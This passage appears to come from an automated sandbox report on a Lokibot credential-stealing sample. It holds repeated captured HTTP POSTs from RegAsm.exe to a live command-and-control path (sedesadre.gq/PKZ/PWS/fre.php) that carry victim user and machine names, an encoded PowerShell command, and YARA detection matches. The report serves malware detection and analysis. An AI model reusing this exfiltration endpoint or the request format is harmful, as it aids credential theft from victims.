                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.749730141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:33.273428917 CET2267OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:33.301081896 CET2267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:33.400113106 CET2268INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:33 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.749731141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:33.757390976 CET2268OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:33.785821915 CET2269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:33.852927923 CET2269INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:33 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.749732141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:36.325134993 CET2270OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:36.360503912 CET2270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:36.428849936 CET2270INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:36 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.749718141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:27.285135984 CET2250OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:27.313807011 CET2250OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:27.393636942 CET2250INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:27 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.749719141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:27.785438061 CET2251OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:27.813057899 CET2252OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:27.888789892 CET2252INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:27 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.749720141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:28.227778912 CET2253OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:28.259017944 CET2253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:28.346106052 CET2253INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:28 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.749721141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:28.704062939 CET2254OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:28.731426001 CET2254OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:28.798693895 CET2255INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:28 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.749722141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:29.504055977 CET2256OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:29.535098076 CET2256OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:29.613061905 CET2256INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:29 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.749723141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:30.023507118 CET2257OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:30.051918030 CET2257OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:30.124555111 CET2258INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:30 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.749724141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:30.488584995 CET2258OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:30.515988111 CET2259OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:30.593492031 CET2259INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:30 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          9192.168.2.749725141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:30.920170069 CET2260OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:30.948132038 CET2260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:31.018574953 CET2260INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:30 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:16:50:23
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          Imagebase:0xd60000
                                                                                                          File size:313856 bytes
                                                                                                          MD5 hash:3039FA7B347872C33C247581A27A7560
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:16:50:23
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"powershell" Get-Date
                                                                                                          Imagebase:0xe60000
                                                                                                          File size:430592 bytes
                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:16:50:24
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6edaf0000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:16:50:41
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                          Imagebase:0x7ff732630000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:16:51:46
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                          Imagebase:0xe60000
                                                                                                          File size:430592 bytes
                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:16:51:46
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6edaf0000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:16:52:22
                                                                                                          Start date:29/11/2022
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          Imagebase:0x650000
                                                                                                          File size:64616 bytes
                                                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:97
                                                                                                            Total number of Limit Nodes:5
